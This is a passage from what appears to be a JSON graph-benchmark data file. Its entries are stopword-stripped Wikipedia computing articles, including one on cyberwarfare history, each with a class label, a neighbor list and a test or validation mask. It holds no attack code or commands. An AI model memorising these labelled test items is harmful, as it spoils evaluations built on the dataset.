never previously reported would mean loss nearly entire arsenal biggest artillery piece ukrainian armed forces according ukrainian army number incorrect losses artillery weapons way reported losses nothing stated cause 2014 russians suspected use cyber weapon called snake ouroboros conduct cyber attack ukraine period political turmoil snake tool kit began spreading ukrainian computer systems 2010 performed computer network exploitation cne well highly sophisticated computer network attacks cna december 23 2015 blackenergy malware used cyberattack ukraine powergrid left 200,000 people temporarily without power mining company large railway operator also victims attack mi6 reportedly infiltrated al qaeda website replaced instructions making pipe bomb recipe making cupcakes october 2010 iain lobban director government communications headquarters gchq said uk faces real credible threat cyber attacks hostile states criminals government systems targeted 1,000 times month attacks threatened uk economic future countries already using cyber assaults put pressure nations 12 november 2013 financial organisations london conducted cyber war games dubbed 'waking shark 2 simulate massive internet-based attacks bank financial organisations waking shark 2 cyber war games followed similar exercise wall street iran victim predator several cyberwarfare operations iran considered emerging military power field september 2010 iran attacked stuxnet worm thought specifically target natanz nuclear enrichment facility 500-kilobyte computer worm infected least 14 industrial sites iran including natanz uranium-enrichment plant although official authors stuxnet ’ officially identified stuxnet believed developed deployed united states israel worm said advanced piece malware ever discovered significantly increases profile cyberwarfare 2006 war hezbollah israel alleges cyber-warfare part conflict israel defense forces idf intelligence estimates several countries middle east used russian hackers scientists operate behalf result israel attached growing importance cyber-tactics became along u.s. france couple nations involved cyber-war planning many international high-tech companies locating research development operations israel local hires often veterans idf elite computer units richard a. clarke adds israeli friends learned thing two programs working two decades september 2007 israel carried airstrike syria dubbed operation orchard u.s. industry military sources speculated israelis may used cyberwarfare allow planes pass undetected radar syria following us president donald trump decision pull iran nuclear deal may 2018 cyber warfare units united states israel monitoring internet traffic iran noted surge retaliatory cyber attacks iran security firms warned iranian hackers sending emails containing malware diplomats work foreign affairs offices us allies employees telecommunications companies trying infiltrate computer systems august 15 2012 11:08 local time shamoon virus began destroying 35,000 computer systems rendering inoperable virus used target saudi government causing destruction state owned national oil company saudi aramco attackers posted pastie pastebin.com hours prior wiper logic bomb occurring citing oppression al-saud regime reason behind attack attack well staged according christina kubecka former security advisor saudi aramco attack group leader security aramco overseas unnamed saudi aramco employee information technology team opened malicious phishing email allowing initial entry computer network around mid-2012 kubecka also detailed black hat usa talk saudi aramco placed majority security budget ics control network leaving business network risk major incident realize security budget spent ics gets pwnd virus noted behavior differing malware attacks due destructive nature cost attack recovery us defense secretary leon panetta called attack cyber pearl harbor known years later biggest hack history intended cyber warfare shamoon spread infected machine computers network system infected virus continues compile list files specific locations system upload attacker erase finally virus overwrites master boot record infected computer making unusable saudi aramco announced attack facebook page went offline company statement issued 25 august 2012 statement falsely reported normal business resumed 25 august 2012 however middle eastern journalist leaked photographs taken 1 september 2012 showing kilometers petrol trucks unable loaded due backed business systems still inoperable august 29 2012 attackers behind shamoon posted another pastie pastebin.com taunting saudi aramco proof still retained access company network post contained username password security network equipment new password ceo khalid al- falih attackers also referenced portion shamoon malware proof pastie according kubecka order restore operations saudi aramco used large private fleet aircraft available funds purchase much world hard drives driving price new hard drives required quickly possible oil prices affected speculation september 1 2012 gasoline resources dwindling public saudi arabia 17 days august 15th attack rasgas also affected different variant crippling similar manner march 2018 american republican fundraiser elliott broidy filed lawsuit qatar alleging qatar government stole leaked emails order discredit viewed impediment plan improve country standing washington may 2018 lawsuit named mohammed bin hamad bin khalifa al thani brother emir qatar associate ahmed al-rumaihi allegedly orchestrating qatar cyber warfare campaign broidy litigation revealed cybercriminals targeted broidy targeted many 1,200 individuals also well-known enemies qatar senior officials u.a.e. egypt saudi arabia bahrain hackers almost always obscured location activity traced telecommunication network qatar united arab emirates launched several cyber-attacks past targeting dissidents ahmed mansoor emirati citizen jailed sharing thoughts facebook twitter given code name egret state-led covert project called raven spied top political opponents dissidents journalists project raven deployed secret hacking tool called karma spy without requiring target engage web links cyberwarfare united states part american military strategy proactive cyber defence use cyberwarfare platform attack new united states military strategy makes explicit cyberattack casus belli traditional act war 2013 cyberwarfare first time considered larger threat al qaeda terrorism many u.s. intelligence officials 2017 representative mike rogers chairman u.s. house permanent select committee intelligence instance said cyber war country americans n't know necessarily winning got huge challenges comes cybersecurity u.s. government security expert richard a. clarke book cyber war may 2010 defines cyberwarfare actions nation-state penetrate another nation computers networks purposes causing damage disruption economist describes cyberspace fifth domain warfare william j. lynn u.s. deputy secretary defense states doctrinal matter pentagon formally recognized cyberspace new domain warfare become critical military operations land sea air space 2009 president barack obama declared america digital infrastructure strategic national asset may 2010 pentagon set new u.s. cyber command uscybercom headed general keith b. alexander director national security agency nsa defend american military networks attack countries systems eu set enisa european union agency network information security headed prof. udo helmbrecht plans significantly expand enisa capabilities united kingdom also set cyber-security operations centre based government communications headquarters gchq british equivalent nsa u.s. however cyber command set protect military whereas government corporate infrastructures primarily responsibility respectively department homeland security private companies february 2010 top american lawmakers warned threat crippling attack telecommunications computer networks sharply rise according lipman report numerous key sectors u.s. economy along nations currently risk including cyber threats public private facilities banking finance transportation manufacturing medical education government dependent computers daily operations 2009 president obama stated cyber intruders probed electrical grids economist writes china plans winning informationised wars mid-21st century note countries likewise organizing cyberwar among russia israel north korea iran boasts world second-largest cyber-army james gosler government cybersecurity specialist worries u.s. severe shortage computer security specialists estimating 1,000 qualified people country today needs force 20,000 30,000 skilled experts july 2010 black hat computer security conference michael hayden former deputy director national intelligence challenged thousands attendees help devise ways reshape internet security architecture explaining guys made cyberworld look like north german plain january 2012 mike mcconnell former director national intelligence national security agency president george w. bush told reuters news agency u.s. already launched attacks computer networks countries mcconnell name country u.s. attacked according sources may iran june 2012 new york times reported president obama ordered cyber attack iranian nuclear enrichment facilities august 2010 u.s. first time warned publicly chinese military use civilian computer experts clandestine cyber attacks aimed american companies government agencies pentagon also pointed alleged china-based computer spying network dubbed ghostnet revealed research report last year pentagon stated people liberation army using information warfare units develop viruses attack enemy computer systems networks units include civilian computer professionals commander bob mehal monitor pla buildup cyberwarfare capabilities continue develop capabilities counter potential threat united states department defense sees use computers internet conduct warfare cyberspace threat national security united states joint forces command describes attributes cyberspace technology emerging instrument power societies becoming available country opponents may use attack degrade disrupt communications flow information low barriers entry coupled anonymous nature activities cyberspace list potential adversaries broad furthermore globe-spanning range cyberspace disregard national borders challenge legal systems complicate nation ability deter threats respond contingencies february 2010 united states joint forces command released study included summary threats posed internet little investment cloaked veil anonymity adversaries inevitably attempt harm national interests cyberspace become main front irregular traditional conflicts enemies cyberspace include states non-states range unsophisticated amateur highly trained professional hackers cyberspace enemies target industry academia government well military air land maritime space domains much way airpower transformed battlefield world war ii cyberspace fractured physical barriers shield nation attacks commerce communication indeed adversaries already taken advantage computer networks power information technology plan execute savage acts terrorism also influence directly perceptions u.s. government american population 6 october 2011 announced creech afb drone predator fleet command control data stream keylogged resisting attempts reverse exploit past two weeks air force issued statement virus posed threat operational mission 21 november 2011 widely reported u.s. media hacker destroyed water pump curran-gardner township public water district illinois however later turned information false inappropriately leaked illinois statewide terrorism intelligence center according foreign policy magazine nsa tailored access operations tao unit successfully penetrated chinese computer telecommunications systems almost 15 years generating best reliable intelligence information going inside people republic china 24 november 2014 sony pictures entertainment hack release confidential data belonging sony pictures entertainment spe june 2015 united states office personnel management opm announced target data breach targeting records many four million people later fbi director james comey put number 18 million washington post reported attack originated china citing unnamed government officials 2016 jeh johnson united states secretary homeland security james clapper u.s. director national intelligence issued joint statement accusing russia interfering 2016 united states presidential election new york times reported obama administration formally accused russia stealing disclosing democratic national committee emails u.s. law 50 u.s.c.title 50 – war national defense chapter 15 – national security subchapter iii accountability intelligence activities must formal presidential finding prior authorizing covert attack u.s. vice president joe biden said american news interview program meet press united states respond new york times noted biden comment seems suggest mr. obama prepared order — already ordered — kind covert action december 29 united states imposed extensive sanctions russia since cold war expelling 35 russian diplomats united states united states used cyberattacks tactical advantage afghanistan 2014 barack obama ordered intensification cyberwarfare north korea missile program sabotaging test launches opening seconds 2016 president barack obama authorized planting cyber weapons russian infrastructure final weeks presidency response moscow alleged interference 2016 presidential election march 2017 wikileaks published 8,000 documents cia confidential documents codenamed vault 7 dated 2013–2016 include details cia software capabilities ability compromise cars smart tvs web browsers including google chrome microsoft edge mozilla firefox opera software asa operating systems smartphones including apple ios google android well operating systems microsoft windows macos linux global perspective countries actors engaged cyber warfare see george washington university-based national security archive cyberwar map kill switch bill br 19 june 2010 united states senator joe lieberman i-ct introduced bill called protecting cyberspace national asset act 2010 co-wrote senator susan collins r-me senator thomas carper d-de signed law controversial bill american media dubbed kill switch bill would grant president emergency powers parts internet however three co-authors bill issued statement instead bill narrowed existing broad presidential authority take telecommunications networks rise cyber warfighting domain led efforts determine cyberspace used foster peace example german civil rights panel runs campaign cyberpeace − control cyberweapons surveillance technology militarization cyberspace development stockpiling offensive exploits malware measures cyberpeace include policymakers developing new rules norms warfare individuals organizations building new tools secure infrastructures promoting open source establishment cyber security centers auditing critical infrastructure cybersecurity obligations disclose vulnerabilities disarmament defensive security strategies decentralization education widely applying relevant tools infrastructures encryption cyberdefenses topics cyber peacekeeping cyber peacemaking also studied researchers way restore strengthen peace aftermath cyber traditional warfare cyber counter-intelligence measures identify penetrate neutralize foreign operations use cyber means primary tradecraft methodology well foreign intelligence service collection efforts use traditional methods gauge cyber capabilities intentions one hardest issues cyber counterintelligence problem attribution unlike conventional warfare figuring behind attack difficult however defense secretary leon panetta claimed united states capability trace attacks back sources hold attackers accountable october 2011 journal strategic studies leading journal field published article thomas rid cyber war take place argued politically motivated cyber attacks merely sophisticated versions sabotage espionage subversion – unlikely cyber war occur future various parties attempted come international legal frameworks clarify acceptable none yet widely accepted tallinn manual published 2013 academic non-binding study international law particular jus ad bellum international humanitarian law apply cyber conflicts cyber warfare written invitation tallinn-based nato cooperative cyber defence centre excellence international group approximately twenty experts 2009 2012 shanghai cooperation organisation members include china russia defines cyberwar include dissemination information harmful spiritual moral cultural spheres states september 2011 countries proposed un secretary general document called international code conduct information security contrast united states approach focuses physical economic damage injury putting political concerns freedom speech difference opinion led reluctance west pursue global cyber arms control agreements however american general keith b. alexander endorse talks russia proposal limit military attacks cyberspace june 2013 barack obama vladimir putin agreed install secure cyberwar-hotline providing direct secure voice communications line us cybersecurity coordinator russian deputy secretary security council need directly manage crisis situation arising ict security incident white house quote ukrainian professor international law alexander merezhko developed project called international convention prohibition cyberwar internet according project cyberwar defined use internet related technological means one state political economic technological information sovereignty independence another state professor merezhko project suggests internet ought remain free warfare tactics treated international landmark states internet cyberspace common heritage mankind february 2017 rsa conference microsoft president brad smith suggested global rules – digital geneva convention – cyber attacks ban nation-state hacking civilian aspects economic political infrastructures also stated independent organization could investigate publicly disclose evidence attributes nation-state attacks specific countries furthermore said technology sector collectively neutrally work together protect internet users pledge remain neutral conflict aid governments offensive activity adopt coordinated disclosure process software hardware vulnerabilities documentaries br videos articles",
    "neighbors": [
      5636,
      10756,
      3092,
      8726,
      10777,
      2084,
      3629,
      1083,
      7228,
      7739,
      9791,
      1088,
      10309,
      7759,
      4689,
      1111,
      8288,
      612,
      107,
      3698,
      7798,
      8824,
      5245,
      5246,
      3711,
      7809,
      9345,
      5764,
      3207,
      9356,
      6797,
      5780,
      150,
      10392,
      10909,
      9375,
      1189,
      2213,
      6312,
      7855,
      176,
      3262,
      704,
      2754,
      9926,
      6344,
      7368,
      9932,
      4813,
      5325,
      7887,
      7893,
      2262,
      6360,
      5337,
      731,
      2779,
      7899,
      3298,
      1251,
      2275,
      6373,
      4326,
      3305,
      5866,
      9460,
      2294,
      5880,
      10492,
      5373,
      3843,
      6406,
      1801,
      9488,
      8978,
      7449,
      4892,
      5404,
      1312,
      8998,
      297,
      3887,
      7983,
      823,
      5433,
      1861,
      4945,
      4435,
      2901,
      1369,
      7515,
      4956,
      1373,
      1886,
      3423,
      3933,
      11611,
      1890,
      5986,
      3941,
      2409,
      7024,
      4475,
      8574,
      6017,
      899,
      9607,
      4489,
      1930,
      11662,
      6031,
      11152,
      3473,
      2975,
      5025,
      3495,
      939,
      9646,
      1970,
      9145,
      8122,
      11195,
      11198,
      3525,
      1480,
      3529,
      9160,
      10196,
      11221,
      8664,
      9688,
      5087,
      3552,
      11244,
      9710,
      9714,
      4595,
      4600,
      2041,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 9689,
    "label": 2,
    "text": "Nanolinux:nanolinux nanolinux open source free lightweight linux distribution requires 14 mb disk space including tiny versions common desktop applications several games based core version tiny core linux distribution uses busybox nano-x instead x.org fltk 1.3.x default gui toolkit slwm super-lightweight window manager included applications mainly based fltk nanolinux includes several lightweight applications including distribution also includes several games tuxchess checkers nxeyes mastermind sudoku blocks support truetype fonts utf-8 also provided nanolinux distributed live cd iso images installation flash disk hard disk documented wiki pages minimal configuration live cd version without swapfile requires 64 mb ram 14 mb disk space",
    "neighbors": [
      516,
      8837,
      7435,
      10127,
      2321,
      4887,
      10394,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      11568,
      2738,
      4790,
      439,
      56,
      8248,
      59,
      7483,
      3903,
      4673,
      2375,
      4039,
      5067,
      8907,
      1110,
      9693,
      2914,
      6371,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7152,
      7920,
      8177,
      499,
      5363,
      9074,
      9461,
      6393,
      11388,
      8957,
      1150
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9690,
    "label": 4,
    "text": "Trust_on_first_use:trust first use trust first use tofu trust upon first use tufu security model used client software needs establish trust relationship unknown not-yet-trusted endpoint tofu model client try look endpoint identifier usually kind public key local trust database identifier exists yet endpoint client software either prompt user determine client trust identifier simply trust identifier given record trust relationship trust database different identifier received subsequent connections endpoint client software consider untrusted tofu approach used connecting arbitrary unknown endpoints trusted third party certificate authority example ssh protocol designed issue prompt first time client connects unknown not-yet-trusted endpoint implementations tofu found http public key pinning browsers always accept first public key returned server http strict transport security browsers obey redirection rule duration 'age directive single largest strength tofu-style model human must initially validate every interaction common application model use ssh-rpc 'bot users computers whereby public keys distributed set computers automated access centralized hosts tofu aspect application forces sysadmin trusted user validate remote server identity upon first connection largest weakness tofu-style model human must initially validate every interaction scale infinitely quickly scale beyond capabilities group people using managing computers need trusted secure protocols people tend approve without verification mention increased surface area human error compromise security scalability use proposed daniel gultsch developer xmpp client conversations call blind trust verification consists checking key first contact check user made manual check key changed first known formal use term tofu tufu cmu researchers dan wendlandt david andersen adrian perrig research paper perspectives improving ssh-style host authentication multi-path probing published 2008 usenix annual technical conference moxie marlinspike mentioned perspectives term tofu def con 18 proceedings reference comments made dan kaminsky panel discussion open letter call action audience suggestion raised implying superiority ssh public key infrastructure pki model ssl/tls pki model whereby moxie replied topics trust validation non-repudiation fundamental work field cryptography digital security",
    "neighbors": [
      3616,
      8674,
      7075,
      517,
      10341,
      10631,
      4746,
      11,
      7212,
      9642,
      10831,
      11345,
      4863,
      2169,
      9884,
      4063
    ],
    "mask": "Test"
  },
  {
    "node_id": 9691,
    "label": 7,
    "text": "Autodesk_Gameware:autodesk gameware autodesk gameware discontinued middleware software suite developed autodesk suite contained tools enable designers create game lighting character animation low level path finding high-level ai advanced user interfaces july 12 2017 autodesk removed scaleform beast humanik navigation online store announced ending support products gameware suite consisted following modules beast content pipeline tool used advanced global illumination dynamic character relighting beast developed sold swedish games lighting technology company illuminate labs acquired autodesk 2010 beast used make light maps shadow maps point clouds advanced global illumination beast precalculate lighting light maps shadow maps point clouds bake occlusion normal maps generate light fields dynamic relighting characters objects beast built-in integration gamebryo lightspeed epic unreal engine evolution several in-house game engines march 2010 unity technologies announced next version unity would feature built-in beast lightmapping global illumination shelf api available projects working beast ready integration beast api programming interface designed make easy possible create beast integration game engine beast used games mirror edge crimecraft mortal kombat vs. dc universe alpha protocol new beast presented gdc 2010 san francisco new version beast features two entirely new modules called distribeast ernst distribeast extremely fast easy use distribution engine managing render farms ernst real-time visualizer allows artists explore control lighting set-up without run complete bake",
    "neighbors": [
      8122,
      3141,
      8454,
      8071,
      2826,
      3210,
      11306,
      2293,
      4182,
      6486,
      5914,
      5083,
      1916
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9692,
    "label": 5,
    "text": "Tsunami_UDP_Protocol:tsunami udp protocol tsunami udp protocol udp-based protocol developed high-speed file transfer network paths high bandwidth-delay product protocols needed standard tcp perform well paths high bandwidth-delay products tsunami effects file transfer chunking file numbered blocks 32 kb communication client server applications flows low bandwidth tcp connection bulk data transferred udp",
    "neighbors": [
      609,
      10924,
      8905,
      11413
    ],
    "mask": "Test"
  },
  {
    "node_id": 9693,
    "label": 2,
    "text": "Knoppix:knoppix knoppix operating system based debian designed run directly cd dvd live cd usb flash drive live usb one first kind operating system knoppix developed named linux consultant klaus knopper starting program loaded removable medium decompressed ram drive decompression transparent on-the-fly although knoppix primarily designed used live cd also installed hard disk like typical operating system computers support booting usb devices load knoppix live usb flash drive memory card two main editions traditional compact-disc 700 megabytes edition dvd 4.7 gigabytes maxi edition main edition two language-specific editions english german knoppix mostly consists free open source software also includes proprietary software long fulfils certain conditions knoppix used copy files easily hard drives inaccessible operating systems quickly safely use linux software live cd used instead installing another os 1000 software packages included cd edition 2600 packages included dvd edition nine gigabytes stored dvd compressed form packages include minimum hardware requirements knoppix prior knoppix 3.8.2 documents settings user created would disappear upon reboot lack persistence made necessary save documents directly hard drive partition network removable media usb flash drive also possible set persistent home directory documents settings written user home directory would automatically redirected hard drive removable media could automatically mounted bootup single file knoppix.img cached rewritable media used simulate file system files written later use allowed user transparently write home directory union mount support added version 3.8.1 unionfs later replaced aufs 5.1.0 improve stability union mount allowed virtual updates data read-only cd/dvd media storing changes separate writable media representing combination two single storage device writable media could memory ramdisk hard disk usb flash drive etc means user could modify software installed knoppix system using apt install update software storage device containing changes needed present whenever knoppix started else original data disc would used knoppix would scan available storage devices persistent home directory default user could dictate specific location boot option see codice_1 carrying knoppix cd usb flash drive user could environment programs settings data available computer could run knoppix functionality available knoppix 5.1.1 cd release 5.3.1 dvd release subsequently live cd paradigm transformed portable operating systems run external storage using knoppix live cd one use boot options also known 'cheatcodes override default setting automatic hardware detection fails example user may wish boot plain console proceed without scsi support knoppix allows user enter one cheat codes prompt booting user enter cheat code press key timeout knoppix boot default options example set language french rather default one would type codice_2 knoppix 32-bit debian linux based distro recent releases including latest version 7.6 also equipped 64-bit kernel dvd edition automatically boot 64-bit computers using boot option codice_3 manually command-line prompt codice_4 boot 32-bit kernel neither pae 64-bit applications supported knoppix system memory 4 gb used 64-bit kernel dvd edition knoppix also loaded onto usb flash drive flash-knoppix knoppix system knoppix live system starts runs factor 5 faster usb flash disk cd dvd besides experimental uefi support provided usb flash drive rather dvd media 32-bit uefi firmware boot 32-bit kernel 64-bit uefi firmware boot 64-bit kernel text interface uefi similar bios one also press key f2 f3 access information boot options knoppix one first live cd linux distributions gain popularity several factors contribute popularity knoppix knoppix works fairly large number pcs laptops automatic hardware detection cope hardware sometimes drivers used optimal knoppix difficulty recognizing cards made 1998 motherboards bios made 2002 cases manual configuration codes entered boot time overcome problems automatic detection pc enough ram run kde included programs legacy knoppix earlier 6.0 boots limited twm session instead window running twm session default xterm table right shows version history major releases april 2008 version 4 5.1.1 knoppix split dvd maxi edition 9 gb software cd light edition developed parallel knoppix 5.1.1 cd editions contained selection graphical environments including twm window manager kde 3 — feature-complete desktop environment default knoppix 5.3.1 earlier development done traditional 5.x versions knoppix 6.0.1 adriane 1.1 cd-edition complete rebuild scratch lxde made default desktop environment edition contains substantially reduced software collection order easily fit cd knoppix 6.2.1 release cd dvd editions adriane 1.2 cd-edition knoppix 6.7.1 last cd version stable touchpad drivers june 2013 march 2019 knoppix 7.2 recent release cd edition 2018 software become outdated libc6 2.17 library longer suffices installation several modern packages 7.x version range known instabilities touchpads version 7.2 still remains recent cd version knoppix wide distribution knoppix 8.0.0 edition released cebit 2017 knoppix 8.1.0 released september 2017 first public release 8.x series version 8.0.0 dual boot choice three different desktops lxde default option kde gnome versions 8.2.0 newer 8.2.x 8.5.x available knoppix mirrors knoppix 8.5 dvd version available download exclusive bundled physical edition linux-magazin linux-user version 8.5 longer includes systemd replaced elogind spectre meltdown kernel vulnerabilities mitigated adriane knoppix variation intended blind visually impaired people used entirely without vision oriented output devices released third quarter 2007 live cd adriane knoppix named adriane knopper wife klaus knopper developer knoppix adriane visual impairment assisting klaus development software name adriane also backronym audio desktop reference implementation networking environment adriane knoppix intended blind also beginners ’ know much computers uses suse blinux screen reader phoneme generator speech engine normal output",
    "neighbors": [
      3073,
      4611,
      6150,
      3079,
      2064,
      3089,
      4113,
      8209,
      10257,
      10774,
      8727,
      4123,
      4637,
      543,
      11297,
      7204,
      9253,
      11305,
      56,
      3129,
      4153,
      59,
      7228,
      8248,
      8254,
      9276,
      4673,
      6213,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      89,
      5721,
      4192,
      3685,
      10860,
      5742,
      2671,
      11388,
      1150,
      2692,
      8837,
      9353,
      652,
      9873,
      11410,
      8857,
      10394,
      11418,
      6301,
      10397,
      5279,
      7840,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      9902,
      2738,
      4790,
      2230,
      4279,
      10425,
      2239,
      9407,
      2763,
      8907,
      3791,
      6352,
      7375,
      7385,
      11481,
      6371,
      4841,
      6890,
      7913,
      6380,
      7920,
      6898,
      5363,
      9461,
      1782,
      5369,
      6393,
      8957,
      4355,
      1801,
      7435,
      2321,
      3859,
      1813,
      5397,
      4887,
      6934,
      8992,
      10016,
      10530,
      6436,
      2853,
      3369,
      7983,
      823,
      3387,
      7483,
      3903,
      11587,
      2375,
      5959,
      330,
      2383,
      9048,
      2905,
      2397,
      8033,
      2914,
      5990,
      9064,
      7020,
      7534,
      11121,
      9074,
      11648,
      390,
      1416,
      905,
      10127,
      912,
      11669,
      10646,
      2967,
      926,
      9119,
      10149,
      6055,
      7082,
      1455,
      8115,
      948,
      439,
      10694,
      4039,
      5067,
      975,
      9689,
      2010,
      485,
      495,
      8177,
      8180,
      5110,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 9694,
    "label": 6,
    "text": "My_Documents:documents documents commonly recognized name special folder microsoft windows even though starting windows vista called documents actual name folder might different language installed copy windows english folder supposed personal area users store personal non-shared documents however many software developers ignored convention result folder become dumping ground application data files containing settings saved games users delete move organize files without causing unwanted behavior software windows xp contained subfolders pictures music videos starting windows vista subfolders moved documents made siblings microsoft first introduced documents folder windows 95 oem service release 2 standard location storing user-created files folder located root directory boot volume shortcut displayed directly user desktop windows nt family operating systems set documents folder user profile folder windows xp earlier path codice_1 alias codice_2 boot volume user later change physical location documents however documents windows explorer file dialog boxes n't appear absolute path addition translation display name folder might change depending owner folder example user logged windows xp later user account look personal folders user account b via windows explorer instead documents b documents seen customization achieved using codice_3 file windows vista made many changes folder dropping name stored codice_4 regardless windows language windows explorer however shows different display name depending chosen language instance english copy windows shows documents french copy shows mes documents german copy shows eigene dokumente changed eigene dateien windows xp additionally pictures music videos longer stored within called pictures music video siblings folder supposed personal area users store personal non-shared documents users supposed sole authority stored folder creating renaming moving deleting contents folder supposed impact proper execution installed software however many software developers ignored convention result folder become dumping ground application data files containing settings saved games example users delete move organize files without causing unwanted behavior software option either live chaos simply store files elsewhere windows 98 introduced two additional folders prefix music pictures present windows server 2003 default unless enabled using start menu customization installing windows media player 10 11 windows xp adds videos folder windows media player uses store video files shown media library windows vista prefix removed three folders expelled called documents addition user folders added contacts downloads favorites links saved games searches windows 10 adds onedrive windows 7 public user folder recorded tv library added libraries list installing visio 2003 adds nowiki shapes /nowiki folder windows machines operate part windows server domain administrators configure location documents special folders group policy corporate desktop deployments commonly redirect documents folder file server",
    "neighbors": [
      7106,
      6088,
      4298,
      4074,
      2027,
      461,
      6797,
      8080,
      8976,
      9972,
      10388,
      9819,
      10751
    ],
    "mask": "None"
  },
  {
    "node_id": 9695,
    "label": 4,
    "text": "Malicious_Software_Removal_Tool:malicious software removal tool microsoft windows malicious software removal tool freely distributed virus removal tool developed microsoft microsoft windows operating system first released january 13 2005 on-demand anti-virus tool on-demand means lacks real-time protection scans computer specific widespread malware tries eliminate infection automatically distributed microsoft windows computers via windows update service also separately downloaded program usually updated second tuesday every month commonly called patch tuesday distributed via windows update point runs automatically background reports malicious software found alternatively users manually download tool microsoft download center records results log file located windir \\debug\\mrt.log run manually times users start mrt.exe using windows command prompt run command start menu released tool configured report anonymized data infections microsoft detected reporting behavior disclosed tool eula disabled desired june 2006 microsoft report company claimed tool removed 16 million instances malicious software 5.7 million 270 million total unique windows computers since release january 2005 report also stated average tool removes malicious software 1 every 311 computers runs microsoft claims software removed password stealer threats 859,842 machines august 2013 malicious software removal tool deleted old vulnerable versions tor client order end spread sefnit botnet mined bitcoins without host owner approval later engaged click fraud approximately two million hosts cleaned october although slightly less half estimated infections rest suspected machines presumably automatic windows updates enabled manually run since support windows 2000 ended july 13 2010 microsoft stopped distributing tool windows 2000 users via windows update last version tool could run windows 2000 4.20 released may 14 2013 starting version 5.1 released june 11 2013 support windows 2000 dropped altogether although windows xp support ended april 8 2014 microsoft announced updates windows xp version malicious software removal tool would provided july 14 2015",
    "neighbors": [
      2309,
      1417,
      2443,
      6797,
      8978,
      537,
      3482,
      5799,
      5673,
      7983,
      7473,
      5173,
      1087,
      5057,
      10828,
      5082,
      7515,
      3935,
      11248
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9696,
    "label": 2,
    "text": "Mark_Galassi:mark galassi mark galassi physicist computer scientist contributor free software movement born manhattan grew france italy currently lives santa fe new mexico works space science applications group los alamos national laboratory research scientist los alamos worked mark galassi involved gnu project since 1984 designed gnu scientific library together james theiler contributed free software projects gnome dominion also currently board chair vice president software freedom conservancy studied liceo classico giuseppe parini graduating 1983 completed ba physics reed college 1986 completed ph.d. physics 1992 institute theoretical physics stony brook martin roček also worked tektronix cygnus solutions part red hat working guile ecos",
    "neighbors": [
      1026,
      2050,
      5644,
      2581,
      10780,
      3618,
      6691,
      2109,
      10817,
      10822,
      5703,
      8263,
      589,
      4177,
      8787,
      3674,
      8304,
      7793,
      3189,
      2180,
      7812,
      8326,
      8848,
      657,
      2195,
      6808,
      1694,
      6302,
      8354,
      8364,
      1717,
      5833,
      6352,
      3802,
      4831,
      10464,
      1761,
      4841,
      9455,
      8436,
      7938,
      4360,
      4367,
      1813,
      7450,
      10012,
      802,
      5410,
      6947,
      5931,
      823,
      11069,
      843,
      11602,
      4437,
      6489,
      9579,
      1394,
      1396,
      11643,
      11654,
      4493,
      10642,
      1939,
      11155,
      3478,
      7584,
      4011,
      9646,
      5555,
      9148,
      9660,
      10687,
      5067,
      8147,
      2010,
      11232
    ],
    "mask": "None"
  },
  {
    "node_id": 9697,
    "label": 4,
    "text": "Piling-up_lemma:piling-up lemma cryptanalysis piling-up lemma principle used linear cryptanalysis construct linear approximation action block ciphers introduced mitsuru matsui 1993 analytical tool linear cryptanalysis piling-up lemma allows cryptanalyst determine probability equality holds x binary variables bits either 0 1 let p denote probability true equals one certain happen equals zero happen first consider piling-up lemma two binary variables formula_2 formula_3 consider due properties xor operation equivalent x x 0 x x 1 mutually exclusive events say must make central assumption piling-up lemma binary variables dealing independent state one effect state others thus expand probability function follows express probabilities p p ½ ε ½ ε ε probability biases — amount probability deviates ½ thus probability bias ε xor sum 2εε formula extended x follows note ε zero one binary variables unbiased entire probability function unbiased — equal ½ related slightly different definition bias formula_8 fact minus two times previous value advantage formula_9 adding random variables amounts multiplying 2nd definition biases practice x approximations s-boxes substitution components block ciphers typically x values inputs s-box values corresponding outputs simply looking s-boxes cryptanalyst tell probability biases trick find combinations input output values probabilities zero one closer approximation zero one helpful approximation linear cryptanalysis however practice binary variables independent assumed derivation piling-up lemma consideration kept mind applying lemma automatic cryptanalysis formula",
    "neighbors": [
      7556,
      2567,
      3084,
      2957,
      7056,
      658,
      660,
      1173,
      1941,
      4128,
      4389,
      10662,
      169,
      11185,
      2357,
      10806,
      1847,
      9528,
      2110,
      9541,
      10315,
      6863,
      8273,
      7635,
      212,
      9556,
      10963,
      11349,
      2265,
      7643,
      8674,
      229,
      618,
      1898,
      881,
      1654,
      7161,
      7034,
      892
    ],
    "mask": "Test"
  },
  {
    "node_id": 9698,
    "label": 6,
    "text": "Lost_cluster:lost cluster lost clusters occur file deleted directory listing file allocation table fat still shows clusters allocated file",
    "neighbors": [
      8129
    ],
    "mask": "None"
  },
  {
    "node_id": 9699,
    "label": 2,
    "text": "Utmp:utmp utmp wtmp btmp variants utmpx wtmpx btmpx files unix-like systems keep track logins logouts system files regular text files rather binary format needs edited specially crafted programs implementation fields present file differ depending system libc version defined utmp.h header file wtmp btmp format exactly like utmp except null value username indicates logout associated terminal actual user name located finding preceding login terminal furthermore value terminal name username shutdown reboot indicates system shutdown reboot respectively files set given pam module pam_unix.so pam_sss.so set application performing operation e.g mingetty /bin/login sshd obligation program record utmp information utmpx wtmpx extensions original utmp wtmp originating sun microsystems utmpx specified posix utmp wtmp btmp files never part official unix standard single unix specification utmpx corresponding apis part systems create different newer files utmpx variants deprecated/obsoleted former formats always case linux example uses utmpx structure place older file structure depending system files may commonly found different places non-exhaustive list linux solaris hp-ux freebsd 9.0 introduced new files adding support utmpx different commands allow users consult information stored files including show current system users last show last logged users lastb show last failed login attempts linux-specific",
    "neighbors": [
      9665,
      5492,
      5397,
      823,
      5435,
      2143
    ],
    "mask": "Test"
  },
  {
    "node_id": 9700,
    "label": 2,
